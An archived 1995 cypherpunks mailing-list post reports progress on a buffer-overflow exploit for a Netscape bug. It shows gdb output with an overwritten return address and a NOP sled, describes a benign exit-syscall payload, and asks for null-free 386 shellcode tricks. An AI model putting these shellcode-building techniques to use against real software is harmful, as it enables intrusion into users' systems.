From: Ray Cromwell <rjc@clark.net>
To: cypherpunks@toad.com
Message Hash: df083b7c0a51deac933a672ee2db41ec0ec6c5f8eacd6f7cd4f8c96c0f04f483
Message ID: <199509270338.XAA09600@clark.net>
Reply To: N/A
UTC Datetime: 1995-09-27 03:38:18 UTC
Raw Date: Tue, 26 Sep 95 20:38:18 PDT
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 26 Sep 95 20:38:18 PDT
To: cypherpunks@toad.com
Subject: Status of Netscape Bug Exploit (suggestions needed)
Message-ID: <199509270338.XAA09600@clark.net>
MIME-Version: 1.0
Content-Type: text/plain
Ok Folks, here's what I got so far...
1) a URL that can place a specific value in the program counter
(gdb) select-frame 2
(gdb) info frame
Stack level 2, frame at 0xefbfbc30:
eip = 0xefbfbc30; saved eip 0x90909090
^^^^^^^^^^^^^^^^
called by frame at 0x90909090, caller of frame at 0xefbfbc14
Arglist at 0xefbfbc30, args:
Locals at 0xefbfbc30, Previous frame's sp is 0xefbfbc1c
Saved registers:
eax at 0xefbfbc2c, ecx at 0xefbfbc28, edx at 0xefbfbc24, ebx at 0xefbfbc20,
ebp at 0xefbfbc18, esi at 0xefbfbc14, edi at 0xefbfbc10, eip at 0xefbfbc0c,
ps at 0xefbfbc08
2) A piece of exploit code on the stack near the PC
(gdb) disassemble 0xefbfbc10 0xefbfbc40
0xefbfbc27: nop
0xefbfbc28: nop
0xefbfbc29: nop
0xefbfbc2a: nop
0xefbfbc2b: nop
0xefbfbc2c: nop
0xefbfbc2d: nop
0xefbfbc2e: nop
0xefbfbc2f: nop
0xefbfbc30: nop
0xefbfbc31: nop
0xefbfbc32: nop
0xefbfbc33: nop
0xefbfbc34: nop
0xefbfbc35: nop
0xefbfbc36: nop
0xefbfbc37: nop
0xefbfbc38: nop
0xefbfbc39: nop
0xefbfbc3a: nop
0xefbfbc3b: nop
0xefbfbc3c: nop
0xefbfbc3d: nop
0xefbfbc3e: nop
0xefbfbc3f: nop
0xefbfbc40: nop
3) exploit code that calls the kernel syscall() with SYS_exit
(benign exploit, causes your browser to exit)
The problem? To make a syscall under BSDI2.0, I have to execute
an lcall 0x7,0x0 with 1,0 on the stack. However, to exploit the netscape
bug, you can not embed 0x0 in the URL. No problem I thought, I searched
Netscape's executable for any kernel calls, and found an lcall 0x7,0x0
at 0x257fee. But I can't do a 32-bit direct jump without a zero,
in the instruction (the 32-bit address is 0x00257fee), and I can't
do a relative jump from 0xefbfbc30+
If you can come up with some 386 assembly under BSDI2.0 which can
invoke syscall() in the kernel without any embeded 0x0 bytes
in the code, you can share a Hack Netscape T-Shirt with me.
If it turns out to be too hard under BSDI, I'll gladly assist
in producing exploits for Windows or another operating system.
One trick I thought up for embeding zeros in the code is to self-modify
the code using XOR ADDRESS,ADDRESS where ADDRESS is a byte on the stack
within the code.
Anyone have any better ones?
-Ray
Return to September 1995
Return to “Ray Cromwell <rjc@clark.net>”
1995-09-27 (Tue, 26 Sep 95 20:38:18 PDT) - Status of Netscape Bug Exploit (suggestions needed) - Ray Cromwell <rjc@clark.net>